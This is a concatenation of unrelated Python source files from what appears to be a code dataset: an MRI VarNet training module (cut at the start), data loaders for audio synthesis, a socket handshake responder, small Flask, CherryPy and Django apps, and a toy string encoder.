metrics["psnr"]
+ 20
* torch.log10(
torch.tensor(
max_vals[fname], dtype=mse_val.dtype, device=mse_val.device
)
)
- 10 * torch.log10(mse_val)
)
metrics["ssim"] = metrics["ssim"] + torch.mean(
torch.cat([v.view(-1) for _, v in ssim_vals[fname].items()])
)
# reduce across ddp via sum
metrics["nmse"] = self.TrainNMSE(metrics["nmse"])
metrics["ssim"] = self.TrainSSIM(metrics["ssim"])
metrics["psnr"] = self.TrainPSNR(metrics["psnr"])
tot_examples = self.TrainTotExamples(torch.tensor(local_examples))
train_loss = self.TrainLoss(torch.sum(torch.cat(losses)))
tot_slice_examples = self.TrainTotSliceExamples(
torch.tensor(len(losses), dtype=torch.float)
)
self.log("training_loss", train_loss / tot_slice_examples, prog_bar=True)
for metric, value in metrics.items():
self.log(f"train_metrics/{metric}", value / tot_examples)
def validation_epoch_end(self, val_logs):
# aggregate losses
losses = []
mse_vals = defaultdict(dict)
target_norms = defaultdict(dict)
ssim_vals = defaultdict(dict)
max_vals = dict()
# use dict updates to handle duplicate slices
for val_log in val_logs:
losses.append(val_log["val_loss"].view(-1))
for k in val_log["mse_vals"].keys():
mse_vals[k].update(val_log["mse_vals"][k])
for k in val_log["target_norms"].keys():
target_norms[k].update(val_log["target_norms"][k])
for k in val_log["ssim_vals"].keys():
ssim_vals[k].update(val_log["ssim_vals"][k])
for k in val_log["max_vals"]:
max_vals[k] = val_log["max_vals"][k]
# check to make sure we have all files in all metrics
assert (
mse_vals.keys()
== target_norms.keys()
== ssim_vals.keys()
== max_vals.keys()
)
# apply means across image volumes
metrics = {"nmse": 0, "ssim": 0, "psnr": 0}
local_examples = 0
for fname in mse_vals.keys():
local_examples = local_examples + 1
mse_val = torch.mean(
torch.cat([v.view(-1) for _, v in mse_vals[fname].items()])
)
target_norm = torch.mean(
torch.cat([v.view(-1) for _, v in target_norms[fname].items()])
)
metrics["nmse"] = metrics["nmse"] + mse_val / target_norm
metrics["psnr"] = (
metrics["psnr"]
+ 20
* torch.log10(
torch.tensor(
max_vals[fname], dtype=mse_val.dtype, device=mse_val.device
)
)
- 10 * torch.log10(mse_val)
)
metrics["ssim"] = metrics["ssim"] + torch.mean(
torch.cat([v.view(-1) for _, v in ssim_vals[fname].items()])
)
# reduce across ddp via sum
metrics["nmse"] = self.NMSE(metrics["nmse"])
metrics["ssim"] = self.SSIM(metrics["ssim"])
metrics["psnr"] = self.PSNR(metrics["psnr"])
tot_examples = self.TotExamples(torch.tensor(local_examples))
val_loss = self.ValLoss(torch.sum(torch.cat(losses)))
tot_slice_examples = self.TotSliceExamples(
torch.tensor(len(losses), dtype=torch.float)
)
self.log("validation_loss", val_loss / tot_slice_examples, prog_bar=True)
for metric, value in metrics.items():
self.log(f"val_metrics/{metric}", value / tot_examples)
def test_step(self, batch, batch_idx):
kspace, masked_kspace, mask, _, fname, slice_num, _, crop_size = batch
crop_size = crop_size[0] # always have a batch size of 1 for varnet
output, extra_outputs = self(kspace, masked_kspace, mask)
# check for FLAIR 203
if output.shape[-1] < crop_size[1]:
crop_size = (output.shape[-1], output.shape[-1])
output = transforms.center_crop(output, crop_size)
return {
"fname": fname,
"slice": slice_num,
"output": output.cpu().numpy(),
}
def configure_optimizers(self):
# This needs to be a class attribute for storing of gradients workaround
self.optim = torch.optim.Adam(
self.parameters(), lr=self.lr, weight_decay=self.weight_decay
)
scheduler = torch.optim.lr_scheduler.StepLR(
self.optim, self.lr_step_size, self.lr_gamma
)
return [self.optim], [scheduler]
@staticmethod
def add_model_specific_args(parent_parser): # pragma: no-cover
"""
Define parameters that only apply to this model
"""
parser = ArgumentParser(parents=[parent_parser], add_help=False)
parser = MriModule.add_model_specific_args(parser)
# param overwrites
# network params
parser.add_argument(
"--num_cascades",
default=12,
type=int,
help="Number of VarNet cascades",
)
parser.add_argument(
"--pools",
default=4,
type=int,
help="Number of U-Net pooling layers in VarNet blocks",
)
parser.add_argument(
"--chans",
default=18,
type=int,
help="Number of channels for U-Net in VarNet blocks",
)
parser.add_argument(
"--sens_pools",
default=4,
type=int,
help="Number of pooling layers for sense map estimation U-Net in VarNet",
)
parser.add_argument(
"--sens_chans",
default=8,
            type=int,
help="Number of channels for sense map estimation U-Net in VarNet",
)
# training params (opt)
parser.add_argument(
"--lr", default=0.0003, type=float, help="Adam learning rate"
)
parser.add_argument(
"--lr_step_size",
default=40,
type=int,
help="Epoch at which to decrease step size",
)
parser.add_argument(
"--lr_gamma",
default=0.1,
type=float,
help="Extent to which step size should be decreased",
)
parser.add_argument(
"--weight_decay",
default=0.0,
type=float,
help="Strength of weight decay regularization",
)
return parser
| 2 | 2 |
src/jsstitcher/jslinker/main.py | DarkTrick/SourceCodeVisualizer | 11 | 12761641 | from jslinker.js_file_stitcher import JsFileStitcher
import sys
import os
class JsStitcherCUI:
@staticmethod
def showHelp():
print("""
Run: jsstitcher inputfile
Works like a simplified version of the C++ preprocessor.
- require ("<file path>");
Tells jsstitcher to include file content of <file path> into the output.
E.g.
fileA:
require ("fileB.js");
            IMPORTANT:
              Use exactly the pattern described above:
                - There must be exactly one space before the bracket
                - Use double quotes ( " ) only - no single quotes
                - There must be a semicolon at the end
Constraints:
              - Does not resolve dependency loops and would run forever in that case.
(E.g. A -> B -> C -> A)
""")
def _run (self, infile):
stitcher = JsFileStitcher ([infile])
result = stitcher.run()
if (result == True):
print (stitcher.getStitchedContent ())
else:
print (result)
def run(self,args):
if (len(args) < 1):
self.__class__.showHelp()
return
infile = args[0]
        infile = os.path.abspath(infile)
self._run (infile)
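# Entry-point sketch (hypothetical; mirrors the invocation described in
# showHelp above):
#
# if __name__ == "__main__":
#     JsStitcherCUI().run(sys.argv[1:])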
| 2.46875 | 2 |
src/wai_data_tools/scripts/manually_reclassify_frames.py | wildlifeai/wai_data_tools | 0 | 12761642 | <filename>src/wai_data_tools/scripts/manually_reclassify_frames.py
"""Script for manually reclassifying frames in a frame image dataset."""
import logging
import pathlib
import pandas as pd
import tqdm
from wai_data_tools import config, io
from wai_data_tools.manual_annotation import controller, model, view
def manually_reclassify_frames(
src_root_dir: pathlib.Path,
config_filepath: pathlib.Path,
) -> None:
"""Manually reclassify assigned classes to frame images using a Tkinter GUI.
Args:
src_root_dir: Path to the source root directory to read frame images
config_filepath: Path to configuration file
"""
logger = logging.getLogger(__name__)
logger.info("Reading config file")
dataset_config = config.load_config(config_filepath=config_filepath)
classes = [label_config["name"] for label_config in dataset_config["labels"] if label_config["is_target"]]
classes.append("background")
logger.info("Found classes %s", classes)
df_frames = pd.read_csv(src_root_dir / "frame_information.csv")
dataset_dir = src_root_dir / "dataset"
logger.info("Starting GUI for reclassification")
video_dirs = [dir_path for dir_path in dataset_dir.iterdir() if dir_path.is_dir()]
for video_dir in tqdm.tqdm(video_dirs):
frames_dict = io.load_frames(frame_dir=video_dir, df_frames=df_frames)
annotation_model = model.ManualAnnotationModel(
frame_dict=frames_dict,
df_frames=df_frames,
video_name=video_dir.name,
src_dir=src_root_dir,
classes=classes,
)
annotation_view = view.ManualAnnotationView()
annotation_controller = controller.ManualAnnotationController(model=annotation_model, view=annotation_view)
annotation_view.set_controller(controller=annotation_controller)
annotation_view.update_view()
annotation_view.show()
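# Example call (hypothetical paths; the directory must contain
# frame_information.csv and a dataset/ folder of per-video frame dirs):
#
# manually_reclassify_frames(
#     src_root_dir=pathlib.Path("frame_dataset"),
#     config_filepath=pathlib.Path("config.yaml"),
# )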
| 2.5 | 2 |
gen_colors.py | kewitz/master | 3 | 12761643 | <gh_stars>1-10
# -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2014 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import NScheme as ns
files = ["./res/L10.msh"]
#files = ["./res/L2.msh"]
def validateColors(colors):
v = True
for color in colors:
for nodes in color:
elements = [e for n in nodes for e in n.elements]
cv = len(elements) == len(set(elements))
v = v and cv
if not cv:
break
assert v, "Existem nós com elementos em comum em uma mesma cor."
bound = {2: 100.0, 5: 0.0}
for f in files:
m = ns.Mesh(file=f, verbose=True, debug=True)
limit = ns.lib.alloc(len(m.nodes))
colors = m.makeColors(limit, bound, 1)
validateColors(colors)
dof = len([n for n in m.nodes if n.calc])
nodes_mapped = sum([len(c) for g in colors for c in g])
    assert dof == nodes_mapped, "Missing nodes. {} < {}".format(nodes_mapped, dof)
print "Done." | 1.898438 | 2 |
setup.py | tuanle618/Img2Mol | 53 | 12761644 | <reponame>tuanle618/Img2Mol
# Copyright 2021 Machine Learning Research @ Bayer AG
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Install script for setuptools."""
from setuptools import setup
setup(
name='img2mol',
version='0.1',
packages=['img2mol'],
url='https://github.com/bayer-science-for-a-better-life/Img2Mol',
license='Apache License, Version 2.0',
author='<NAME>, <NAME>, <NAME> and <NAME>',
author_email='<EMAIL>',
description='Inferring molecules from images'
)
| 1.335938 | 1 |
start.py | Jajabenit250/flask-with-fairseq | 0 | 12761645 | <reponame>Jajabenit250/flask-with-fairseq<filename>start.py
from flask import Flask
app = Flask(__name__)
@app.route('/')
def start():
return 'App Is Started' | 2.21875 | 2 |
util/loading_dataset.py | mimbres/FFTNet | 0 | 12761646 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
loading_dataset.py
Created on Thu May 3 12:47:36 2018
@author: sungkyun
"""
import torch
from torch.utils.data.dataset import Dataset
#from torch import from_numpy
import numpy as np
import pandas as pd
#from sklearn import preprocessing
#from sklearn.preprocessing import StandardScaler
#from sklearn.externals import joblib
import glob
from nnmnkwii import minmax_scale, scale
DIM_INDEX = dict()
DIM_INDEX['linguistic'] = np.arange(0,420) # source: /linguistic
DIM_INDEX['f0'] = [0] # source: /pyworld
DIM_INDEX['log-f0'] = [1] # source: /pyworld
DIM_INDEX['vuv'] = [2] # source: /pyworld
DIM_INDEX['bap'] = [3] # source: /pyworld
DIM_INDEX['melcep'] = np.arange(4,64) # source: /pyworld
DIM_INDEX['pyspec'] = np.arange(64,577) # source: /pyworld
DIM_INDEX['melspec'] = np.arange(0, 128) # source: /melmfcc
DIM_INDEX['mfcc'] = np.arange(128,153) # source: /melmfcc
class CmuArcticDataset(Dataset):
    def __init__(self, data_root_dir=None, random_zpad=False, cond_feature_select=None, transform=None):
#data_root_dir = 'data/processed_slt_arctic/TRAIN/'
#data_root_dir = 'data/processed_slt_arctic/TEST/'
self.mulaw_filepaths = sorted(glob.glob(data_root_dir + 'mulaw/*.npy'))
self.linguistic_filepaths = sorted(glob.glob(data_root_dir + 'linguistic/*.npy'))
self.melmfcc_filepaths = sorted(glob.glob(data_root_dir + 'melmfcc/*.npy'))
self.pyworld_filepaths = sorted(glob.glob(data_root_dir + 'pyworld/*.npy'))
self.file_ids = [path.split('/')[-1][:-4] for path in self.mulaw_filepaths]
self.random_zpad = random_zpad
self.cond_feature_select = cond_feature_select # ['linguistic', 'f0', 'log-f0', 'vuv','bap', 'melcep', 'pyspec', 'melspec', 'mfcc']
self.transform = transform
self.scale_factor = np.load(data_root_dir + '../scale_factors.npy')
# Construct conditional feature selection info
global DIM_INDEX
self.cond_info = dict()
self.cond_dim = 0 # total dimension of condition features
for sel in self.cond_feature_select:
self.cond_info[sel] = np.arange(self.cond_dim, self.cond_dim + len(DIM_INDEX[sel]))
self.cond_dim += len(DIM_INDEX[sel])
def __getitem__(self, index):
# Get 3 items: (file_id, mulaw, cond)
file_id = self.file_ids[index]
x = np.load(self.mulaw_filepaths[index]) # size(x) = (T,)
cond = np.empty((len(x),0), np.float16) # size(cond) = (T,d)
cond_linguistic, cond_pyworld, cond_melmfcc = [], [], []
if any(sel in self.cond_feature_select for sel in ['linguistic']):
cond_linguistic = np.load(self.linguistic_filepaths[index])
if any(sel in self.cond_feature_select for sel in ['f0', 'log-f0', 'vuv', 'bap', 'melcep', 'pyspec']):
cond_pyworld = np.load(self.pyworld_filepaths[index])
if any(sel in self.cond_feature_select for sel in ['melspec', 'mfcc']):
cond_melmfcc = np.load(self.melmfcc_filepaths[index])
global DIM_INDEX
for sel in self.cond_feature_select:
            if sel == 'linguistic':
cond = np.hstack((cond, cond_linguistic))
elif sel in ['f0', 'log-f0', 'vuv', 'bap', 'melcep', 'pyspec']:
cond = np.hstack((cond, cond_pyworld[:,DIM_INDEX[sel]]))
elif sel in ['melspec', 'mfcc']:
cond = np.hstack((cond, cond_melmfcc[:,DIM_INDEX[sel]]))
assert(cond.shape[1]==self.cond_dim) # check if stacked cond feature size mismatches
# Feature-scaling
cond = self.featScaler(cond)
# Transpose
cond = np.transpose(cond) # size(cond) = (T,d) --> (d, T): required for pytorch dataloading
# Random zeropadding 20~50%
if self.random_zpad is True:
zpad_sz = int(len(x) * np.random.uniform(0.2,0.5))
x[0:zpad_sz] = 128 # fill first <zpad_sz> samples with zeros (in mulaw-enc, 128)
cond[:,0:zpad_sz] = 0.
return file_id, torch.LongTensor(x), cond
def featScaler(self, feat):
for sel in self.cond_feature_select:
            if sel == 'linguistic':
feat[:,self.cond_info[sel]] = minmax_scale(feat[:,self.cond_info[sel]],
self.scale_factor['linguistic_min'], self.scale_factor['linguistic_max'], feature_range=(0.01, 0.99))
return feat
def __len__(self):
return len(self.file_ids) # return the number of examples that we have
class YesNoDataset(Dataset):
    def __init__(self, csv_path=None, zpad_target_len=None, transform=None):
# Internal variables
#csv_path = 'data/processed_yesno/test.csv'
#csv_path = 'data/processed_yesno/train.csv'
self.zpad_target_len = zpad_target_len
self.transform = transform
self.file_ids = None
self.mulaw_filepaths = None
self.mfcc_filepaths = None
# Reading .csv file
df = pd.read_csv(csv_path, index_col=0) # ['file_id', 'mulaw_filepath', 'mfcc_filepath']
self.file_ids = df.iloc[:,0]
self.mulaw_filepaths = df.iloc[:,1]
self.mfcc_filepaths = df.iloc[:,2]
def __getitem__(self, index):
# Get 3 items: (file_id, x = mulaw, cond = mfcc)
file_id = self.file_ids[index]
x = np.load(self.mulaw_filepaths[index]) # size = (T,)
cond = np.load(self.mfcc_filepaths[index]) # size = (25,T)
if self.zpad_target_len:
x_length = x.shape[0]
if x_length > self.zpad_target_len:
x = x[0:self.zpad_target_len]
elif x_length < self.zpad_target_len:
zpad_sz = self.zpad_target_len - x_length
                x = np.pad(x, (zpad_sz,0), mode='constant', constant_values=128) # pad the first zpad_sz samples with mu-law zeros (128)
cond_length = cond.shape[1]
if cond_length > self.zpad_target_len:
cond = cond[:, 0:self.zpad_target_len]
elif cond_length < self.zpad_target_len:
zpad_sz = self.zpad_target_len - cond_length
cond = np.pad(cond, ((0,0),(zpad_sz, 0)), mode='constant')
return file_id, torch.LongTensor(x), cond
def __len__(self):
return len(self.file_ids) # return the number of examples that we have
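# Usage sketch (hypothetical paths): wrap the dataset in a DataLoader; each
# item is (file_id, mu-law LongTensor of shape (T,), condition array (d, T)),
# so batch_size=1 avoids collating variable-length utterances.
#
# from torch.utils.data import DataLoader
# train_set = CmuArcticDataset(data_root_dir='data/processed_slt_arctic/TRAIN/',
#                              random_zpad=True,
#                              cond_feature_select=['linguistic', 'log-f0', 'vuv'])
# loader = DataLoader(train_set, batch_size=1, shuffle=True)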
| 2.046875 | 2 |
tool-server/handshake_responder.py | CSharperMantle/arbiter | 0 | 12761647 | <reponame>CSharperMantle/arbiter
from ipaddress import IPv4Address
from socketserver import UDPServer, BaseRequestHandler, StreamRequestHandler, ThreadingMixIn, TCPServer
from math import floor
from random import random
from threading import Thread
from time import sleep, time
from WirelessClientMessage_pb2 import WirelessClientMessage
from WirelessHostMessage_pb2 import WirelessHostMessage
clients = []
class ThreadedUDPServer(ThreadingMixIn, UDPServer):
pass
class ThreadedTCPServer(ThreadingMixIn, TCPServer):
pass
class UDPHandler(BaseRequestHandler):
def handle(self):
in_data = self.request[0].strip()
in_packet = WirelessClientMessage.FromString(in_data)
print("U: Got UDP packet from {}, type {}".format(
self.client_address,
in_packet.type
))
out_socket = self.request[1]
if in_packet.type == WirelessClientMessage.HANDSHAKE_REQUEST:
out_packet = WirelessHostMessage()
out_packet.type = WirelessHostMessage.HANDSHAKE_ASSIGNMENT
out_packet.assignment.id = floor(1023 * random() + 1)
out_packet.assignment.address_ipv4 = int(
IPv4Address(self.client_address[0]))
out_packet.assignment.latency = 0
out_socket.sendto(
out_packet.SerializeToString(),
self.client_address
)
elif in_packet.type == WirelessClientMessage.HANDSHAKE_ASSIGNMENT_CONFIRMATION:
clients.append(
(in_packet.assignment.id, IPv4Address(self.client_address[0]))
)
class TCPHandler(BaseRequestHandler):
    def __init__(self, *args, **kwargs):
        # BaseRequestHandler.__init__ invokes handle() before returning, so any
        # attribute handle() relies on must be set before delegating to it
        self._last_ping = -1
        super().__init__(*args, **kwargs)
def handle(self):
print("T: TCP connection established with {}".format(self.client_address))
while True:
ping_packet = WirelessHostMessage()
ping_packet.type = WirelessHostMessage.PING
out_data = ping_packet.SerializeToString()
sleep(1)
print("T: Pinging {} with {}".format(
self.client_address, out_data
))
self.request.sendall(out_data)
self._last_ping = time()
print("T: Waiting for Pong from {}".format(self.client_address))
in_data = self.request.recv(1024).strip() # assumes one whole message per recv; there is no explicit framing
if not in_data: # an empty read means the peer closed the connection
print("T: Connection closed by {}".format(self.client_address))
break
in_packet = WirelessClientMessage.FromString(in_data)
print("T: Got TCP packet from {}, type {}".format(
self.client_address,
in_packet.type
))
if in_packet.type == WirelessClientMessage.PONG:
print("T: Ping latency: {}".format(time() - self._last_ping))
self._last_ping = -1
sleep(5)
if __name__ == "__main__":
print("Starting handshake responder...")
udp_server = ThreadedUDPServer(("0.0.0.0", 10010), UDPHandler)
tcp_server = ThreadedTCPServer(("0.0.0.0", 10011), TCPHandler)
udp_thread = Thread(target=udp_server.serve_forever, daemon=True)
tcp_thread = Thread(target=tcp_server.serve_forever, daemon=True)
udp_thread.start()
tcp_thread.start()
print("I: UDP server running on thread {}.".format(udp_thread.name))
print("I: TCP server running on thread {}.".format(tcp_thread.name))
try:
while True:
sleep(1) # idle in the main thread without pegging a CPU core
except KeyboardInterrupt:
print("I: Stopping UDP server...")
udp_server.shutdown()
udp_thread.join()
print("I: Stopping TCP server...")
tcp_server.shutdown()
tcp_thread.join()
print("I: Stopped.")
| 2.53125 | 3 |
visualize_2d_data.py | christopher-beckham/tsne-d3-python | 16 | 12761648 | import os
from glob import glob
import argparse
import cherrypy
from jinja2 import Environment, FileSystemLoader
env = Environment(loader=FileSystemLoader('templates'))
DATA_FOLDER = 'data'
class Server(object):
@cherrypy.expose
def index(self, data=None):
data = data if data is not None else DATA_FOLDER
csv_file = '{0}.csv'.format(data)
images_folder = data
if not os.path.exists(os.path.join('public', csv_file)):
return "Error: csv file does not exist in public folder: {0}".format(csv_file)
if not os.path.exists(os.path.join('public', images_folder)):
return "Error: data folder does not exist in public folder: {0}".format(images_folder)
if len(glob(os.path.join('public', images_folder) + '/*')) <= 1:
return "Error: data folder contains at most one file; expected a folder of images: {0}".format(images_folder)
tmpl = env.get_template('index.html')
return tmpl.render(csv_file=csv_file, images_folder=images_folder)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Visualize 2D data. Useful with t-sne data.')
parser.add_argument('--host', type=str, default='0.0.0.0', help='socket host')
parser.add_argument('--port', type=int, default=8080, help='socket port')
parser.add_argument('--data', type=str, default='data', help='data path')
args = parser.parse_args()
DATA_FOLDER = args.data
conf = {
'global' : {
'server.socket_host' : args.host,
'server.socket_port' : args.port
},
'/': {
'tools.sessions.on': True,
'tools.staticdir.root': os.path.abspath(os.getcwd())
},
'/static': {
'tools.staticdir.on': True,
'tools.staticdir.dir': './public'
}
}
cherrypy.quickstart(Server(), '/', conf)
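# Expected layout (inferred from the checks in Server.index; names hypothetical):
#   public/data.csv   - csv consumed by templates/index.html (e.g. 2D t-sne coordinates per image)
#   public/data/*.png - the images referenced from the csv
# Example launch serving public/tsne_mnist.csv and public/tsne_mnist/:
#   python visualize_2d_data.py --host 127.0.0.1 --port 9000 --data tsne_mnist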
| 2.640625 | 3 |
API_Forms/gestionPedidos/Forms.py | BrianMarquez3/Python-Django | 2 | 12761649 | # API FORMS
from django import forms
class FormularioContacto(forms.Form):
asunto=forms.CharField()
email=forms.EmailField()
mensaje=forms.CharField()
| 1.578125 | 2 |
shiSock-0.3.0/test/shikhar/shikhar.py | AnanyaRamanA/shiSock | 0 | 12761650 | from base64 import b64encode, b64decode
from random import shuffle, sample, randint
from fractions import Fraction
a = {"a":1,"b":2,"c":3,"d":4,"e":5,"f":6,"g":7,"h":8,"i":9,"j":10,"k":11,"l":12,
"m":13,"n":14,"o":15,"p":16,"q":17,"r":18,"s":19,"t":20,"u":21,"v":22,"w":23,
"x":24,"y":25,"z":26,"?" : 0}
b = {0:"?", 1: 'a', 2: 'b', 3: 'c', 4: 'd', 5: 'e', 6: 'f', 7: 'g', 8: 'h', 9: 'i', 10: 'j',
11: 'k', 12: 'l', 13: 'm', 14: 'n', 15: 'o', 16: 'p', 17: 'q', 18: 'r', 19: 's',
20: 't', 21: 'u', 22: 'v', 23: 'w', 24: 'x', 25: 'y', 26: 'z'}
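# b is simply the inverse mapping of a and could equivalently be derived as:
#   b = {v: k for k, v in a.items()}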
special = list("!@#$%^&*()~`")
def shikharEncode(data):
specials = special[:] # work on a copy so shuffling does not reorder the module-level list
shuffle(specials)
qw = ""
for l in data:
qw += str(a[l]) + "0" # letter code followed by a 0 separator digit
qw = int(qw)
random_num = randint(9999999,99999999)
multiply = qw * random_num
new_str = ""
for i,num in enumerate(str(multiply)):
if num == "0":
new_str += num
else:
new_str += b[int(num)]
len_new_str = len(new_str)
samples = sample(range(1,len_new_str),10)
new_str_lst = list(new_str)
for i,key in enumerate(samples):
new_str_lst.insert(key, specials[i]) # splice in decoy characters; shikharDecode strips them back out
asa ="".join([b[int(x)] for x in str(random_num)])
join = "".join(new_str_lst) + "|~|" + asa
return b64encode(bytes(join,"utf-8"))
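# A quick round-trip sketch (assuming only letters from the table above; letters
# whose code contains the digit 0 -- 'j' (10) and 't' (20) -- and '?' do not
# survive decoding, because 0 doubles as the separator):
#   token = shikharEncode("hello")
#   shikharDecode(token)  # -> "hello"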
def shikharDecode(data):
res = b64decode(data).decode().split("|~|")
random_num = int("".join([str(a[x]) for x in list(res[1])]))
lst = [x for x in list(res[0]) if x not in special]
number_str = ""
for char in lst:
if char == "0":
number_str += "0"
else:
number_str += str(a[char])
number_str = Fraction(int(number_str))
random_num = Fraction(random_num)
real_num = number_str/random_num
get = str(real_num).split("0") # 0 is the separator, so codes containing a 0 digit ('j'=10, 't'=20, '?'=0) cannot round-trip
return "".join([b[int(x)] for x in get if x != ""])
| 2.875 | 3 |